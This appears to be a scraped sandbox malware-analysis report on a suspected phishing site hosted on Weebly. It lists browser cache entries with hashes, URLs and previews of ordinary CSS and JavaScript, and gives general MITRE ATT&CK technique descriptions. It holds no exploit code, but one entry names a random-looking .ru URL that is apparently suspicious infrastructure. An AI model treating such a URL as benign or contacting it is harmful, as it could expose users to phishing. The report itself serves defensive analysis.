File Type:	ASCII text, with very long lines (3910)
Category:	downloaded
Size (bytes):	3911
Entropy (8bit):	5.0666543016860475
Encrypted:	false
SSDEEP:
MD5:	1DCEBBB5A1EB8B028310CEEB72A339B3
SHA1:	E254B7A35AC189FD1CE9CF8BD78593BEBFE27D7D
SHA-256:	865CB87DE9FC4D6530EDCE21F0103107ABAE6ABE45CABDFF2AD9AF067B3D8E0A
SHA-512:	1FE84409EC4FEAF49C31208668D29F215EA8136EA49134171F4A930963745031520068C0E17783EE557FAE24590B4079E8ECEEB010766466D7C8097AE97F1E53
Malicious:	false
Reputation:	unknown
URL:	https://cdn2.editmysite.com/css/old/fancybox.css?1733963355
Preview:	/! fancyBox v2.1.0 fancyapps.com \| fancyapps.com/fancybox/#license /.fancybox-wrap,.fancybox-skin,.fancybox-outer,.fancybox-inner,.fancybox-image,.fancybox-wrap iframe,.fancybox-wrap object,.fancybox-nav,.fancybox-nav span,.fancybox-tmp{padding:0;margin:0;border:0;outline:none;vertical-align:top}.fancybox-wrap{position:absolute;top:0;left:0;z-index:8020}.fancybox-skin{position:relative;background:#f9f9f9;color:#444;text-shadow:none;border-radius:4px}.fancybox-opened{z-index:8030}.fancybox-opened .fancybox-skin{box-shadow:0 10px 25px rgba(0,0,0,0.5)}.fancybox-outer,.fancybox-inner{position:relative}.fancybox-inner{overflow:hidden}.fancybox-type-iframe .fancybox-inner{-webkit-overflow-scrolling:touch}.fancybox-error{color:#444;font:14px/20px "Helvetica Neue",Helvetica,Arial,sans-serif;margin:0;padding:15px;white-space:nowrap}.fancybox-image,.fancybox-iframe{display:block;width:100%;height:100%}.fancybox-image{max-width:100%;max-height:100%}#fancybox-loading,.fancybox-close,.fancybox-pr

Chrome Cache Entry: 173

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	very short file (no magic)
Category:	downloaded
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
URL:	https://vnlwvl177gpmte6zxp4fqjrlvykjvt4pw3givqitiuyvveb6g9eulf2w.bfcgpixdwnw.ru/lTivqzSQhgmMqWjxHfWANsbpbXfwlUCHmJAXAJEXOHSGJCXSYWCJLXYDFNNQWQOPXBEOVXRANXMSNAJYGGZNTBZN
Preview:	1

Chrome Cache Entry: 174

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Web Open Font Format (Version 2), TrueType, length 16560, version 2.6553
Category:	downloaded
Size (bytes):	16561
Entropy (8bit):	7.987447249447863
Encrypted:	false
SSDEEP:
MD5:	27958408325380D903E67D87768563B8
SHA1:	D728E699C79072F1C7B9602C771E241B8C04C8A4
SHA-256:	83F8B8932766826C1DD3A228B48F4072586CA09F781D64E2950D9F0E235C00A0
SHA-512:	EC3C2CB0C96B77D361CC542C0282D61789E238FB69E1E65BCADA946367AF9E2D0577E7FDA69CEC7C495856BCC14AEBFA26BE2A52699FF38EE85C019034C0C31D
Malicious:	false
Reputation:	unknown
URL:	https://simatantincendi.weebly.com/files/theme/fonts/2cd55546-ec00-4af9-aeca-4a3cd186da53.woff2?1734018525
Preview:	wOF2......@...........@L..........................2?LINO..`..L..b.."..........6.$..x..\|.. .... ..L...l.V...q.N.L.7Fn... ......V.bc......1.h..D..RQj..F.=..s...8..e+.. ...k).....#q...#.q@.E.X..7...............0_................J`.m...FG..r.; ...4.[..........n.....S.'.rk......AS8....p......a...&..J.......%JI..QAl\..].z.....]..]...;....C..XdI..U.D'........+;b.3m.O.`Z....$..L.M.?7..f.zVrc....a..,...T.k;4.R..V....-a..~BO.s....1{.b\|.....0.!.m.2@...2.I..]...U...$......o.-......J;H.g..:..F..Z"i7.<...P...2.t.^..J.X8...}..._f.M.)...G.zS.Kci..........&,.k..6.Y.?H.+gc....p.@.(.......h....S(J.dW....... \|. ....C*p.+...P.@z...V..sH%..@H..s.U........G..O.B.D.Do..3.....?..=......Mb.TJ..6m........<.....e1..V.u...a.La.'.x._J.".B.A.x_L....{~...%.p.g......d!.....w.3......\..h`I..w%..K...~?T........t...S.-.....M.]b..ji.$..?p.I...[.o.dg].%.E.....G'..........&..;../...IM....%.Fy.. .>=.X. m...jw.....H.............R..g...8r.W.\|...<2rj.Z:..~q.....I.X...U_.........nE..I.u+......b

Chrome Cache Entry: 175

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Unicode text, UTF-8 text, with very long lines (64241)
Category:	downloaded
Size (bytes):	167730
Entropy (8bit):	5.045981547409661
Encrypted:	false
SSDEEP:
MD5:	AFB5C64B13342F6E568093548D0A2A9F
SHA1:	95FC121CCCFDBA12443CF87A9C823486065A14AB
SHA-256:	238DB52476BF8107E2E851CD3299B071ED5944B570C1603A1EA758A4FADF5F29
SHA-512:	6FE8BADD1B94E81464C0808383A4CC77F779BF226A3C13B58B2BCB36332995EFBC7711373EE8AB2A8BC52675884F9885D168CB2DE9535E39E71B0B72940691E1
Malicious:	false
Reputation:	unknown
URL:	https://www.microsoft.com/onerfstatics/marketingsites-wcus-prod/west-european/shell/_scrf/css/themes=default.device=uplevel_web_pc/2b-7ae144/7e-3283eb/69-8122fc/86-016699/72-2b1d8c/80-6461e7/2a-d9be59/51-40faf7?ver=2.0
Preview:	@charset "UTF-8";./! \| Copyright 2017 Microsoft Corporation \| This software is based on or incorporates material from the files listed below (collectively, "Third Party Code"). Microsoft is not the original author of the Third Party Code. The original copyright notice and the license under which Microsoft received Third Party Code are set forth below together with the full text of such license. Such notices and license are provided solely for your information. Microsoft, not the third party, licenses this Third Party Code to you under the terms in which you received the Microsoft software or the services, unless Microsoft clearly states that such Microsoft terms do NOT apply for a particular Third Party Code. Unless applicable law gives you more rights, Microsoft reserves all other rights not expressly granted under such agreement(s), whether by implication, estoppel or otherwise././! normalize.css v3.0.3 \| MIT License \| github.com/necolas/normalize.css /.body{margin:0}.context-uh

Chrome Cache Entry: 176

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	downloaded
Size (bytes):	178695
Entropy (8bit):	5.060653328832338
Encrypted:	false
SSDEEP:
MD5:	DE7AC762D7192317C3572809C9EF6516
SHA1:	5522312E36493733AA5BEB1B718F6F615C681EA2
SHA-256:	14FBE8896DA2BDEA2AA0A10693E0F33DD6F6FBD72AE3C07EE9F1BC40299FD1CA
SHA-512:	BEBCC164001F508A37D90A72C04B5CA38DF4FDAA96E822A3BF46CD6CE64EC07312C401A6FD9FF833082756137EA2A08FF184255CA81E87245B16317074101E81
Malicious:	false
Reputation:	unknown
URL:	https://cdn2.editmysite.com/css/sites.css?buildTime=1733963355
Preview:	@keyframes spin{0%{transform:rotate(0deg)}100%{transform:rotate(360deg)}}/! Reflex v1.5.0 - https://github.com/leejordan/reflex /.grid{display:inline-block;display:-ms-flexbox;display:flex;display:inline;zoom:1;-ms-flex-wrap:wrap;flex-wrap:wrap;padding:0;margin:0;position:relative;width:100%;max-width:100%;letter-spacing:-0.31em !important;letter-spacing:normal !important;word-spacing:-0.43em !important;list-style-type:none}.grid:before,.grid:after{letter-spacing:normal;word-spacing:normal;white-space:normal;max-width:100%}.grid :before,.grid :after{letter-spacing:normal;word-spacing:normal;white-space:normal}.grid .grid{-ms-flex:1 1 auto;flex:1 1 auto}.grid {box-sizing:border-box}.grid :before,.grid :after{box-sizing:border-box}[class="grid__col-"]{display:inline-block;display:-ms-flexbox;display:flex;*display:inline;zoom:1;-ms-flex-direction:column;flex-direction:column;letter-spacing:normal;word-spacing:normal;white-space:normal;position:relative;width:100%;vertical-align:

Chrome Cache Entry: 177

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	downloaded
Size (bytes):	16
Entropy (8bit):	3.75
Encrypted:	false
SSDEEP:
MD5:	F2CF464A7176184BC3E76EB6DC4BE64A
SHA1:	8C7B107A8DE35FD119C5466489036B34F11476AD
SHA-256:	D9F92065EDF5CEFFA80FD0C41A290A79D052357B582BD6C1F68F80226156671A
SHA-512:	2E5BDD92E8384E0316D3FE5834C5764F8AC4FEF6A69C672551B8348798DD9F83DCC0B5EB2D3F0A6A3DAB99003933CF9A629E4BDF3A0451B82DCF036D05002D5C
Malicious:	false
Reputation:	unknown
URL:	https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAmiOCrUeW3bjRIFDaOHx6M=?alt=proto
Preview:	CgkKBw2jh8ejGgA=

Chrome Cache Entry: 178

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (32029)
Category:	downloaded
Size (bytes):	534233
Entropy (8bit):	5.342855159673219
Encrypted:	false
SSDEEP:
MD5:	9AD9E21156347D605CC28371AEEBECC0
SHA1:	28320A93D55B98FD485994D572730CDE7B04E4BB
SHA-256:	15FE2327876F27B40231932F043FDB5823BDCC8F9F01B2F4DE69DA0EFE76A529
SHA-512:	91FAF32888507FDEF4009047F1ABFD414D76B9A946DF26F6195D4FC5CABFB69D12F1B62D59CA05F5D1E0A227865708F2D869C334973A9103BDFEDE74693771B3
Malicious:	false
Reputation:	unknown
URL:	https://cdn2.editmysite.com/js/site/main-customer-accounts-site.js?buildTime=1733963355
Preview:	(function(e){var t={};function n(r){if(t[r])return t[r].exports;var i=t[r]={exports:{},id:r,loaded:false};e[r].call(i.exports,i,i.exports,n);i.loaded=true;return i.exports}n.m=e;n.c=t;n.p="https://cdn2.editmysite.com/js/";n.p="https://"+window.ASSETS_BASE+"/js/"\|\|n.p;return n(0)})([function(e,t,n){e.exports=n(321)},function(e,t,n){var r;!(r=function(){if(window.Weebly!==undefined&&window.Weebly.jQuery!==undefined){return window.Weebly.jQuery}return window.jQuery}.call(t,n,t,e),r!==undefined&&(e.exports=r))},function(e,t,n){var r,i;!(r=[n(1)],i=function(e){window.Weebly=window._W=window._W\|\|{};window._W.utl=window._W.utl\|\|function(e){window._W.failedTls=window._W.failedTls\|\|[];window._W.failedTls.push(e);return e};window._W.ftl=window._W.ftl\|\|function(e){window._W.failedFtls=window._W.failedFtls\|\|[];window._W.failedFtls.push(e);return""};window._W.utl=window._W.utl\|\|function(e){window._W.failedUtls=window._W.failedUtls\|\|[];window._W.failedUtls.push(e);return""};window._W.stl=window._W.s

Chrome Cache Entry: 179

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	61
Entropy (8bit):	3.990210155325004
Encrypted:	false
SSDEEP:
MD5:	9246CCA8FC3C00F50035F28E9F6B7F7D
SHA1:	3AA538440F70873B574F40CD793060F53EC17A5D
SHA-256:	C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
SHA-512:	A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR...............s....IDAT.....$.....IEND.B`.

Static File Info

⊘No static file info

Description:	Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.
Tactics:	Persistence
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Process: Process Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report https://simatantincendi.weebly.com/

Overview

General Information

Detection

Signatures

Classification

Process Tree

Yara Signatures

Dropped Files

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

Phishing

Compliance

Networking

System Summary

Boot Survival

Mitre Att&ck Matrix

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

LLM Input / Output

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Chrome Cache Entry: 106

Chrome Cache Entry: 107

Chrome Cache Entry: 108

Chrome Cache Entry: 110

Chrome Cache Entry: 111

Chrome Cache Entry: 112

Chrome Cache Entry: 113

Chrome Cache Entry: 118

Chrome Cache Entry: 119

Chrome Cache Entry: 120

Chrome Cache Entry: 123

Chrome Cache Entry: 124

Chrome Cache Entry: 127

Chrome Cache Entry: 128

Chrome Cache Entry: 130

Chrome Cache Entry: 131

Chrome Cache Entry: 133

Chrome Cache Entry: 134

Chrome Cache Entry: 140

Chrome Cache Entry: 144

Chrome Cache Entry: 145

Chrome Cache Entry: 147

Chrome Cache Entry: 150

Chrome Cache Entry: 151

Chrome Cache Entry: 152

Chrome Cache Entry: 155

Chrome Cache Entry: 157

Chrome Cache Entry: 159

Chrome Cache Entry: 160

Chrome Cache Entry: 161

Chrome Cache Entry: 162

Windows Analysis Report
https://simatantincendi.weebly.com/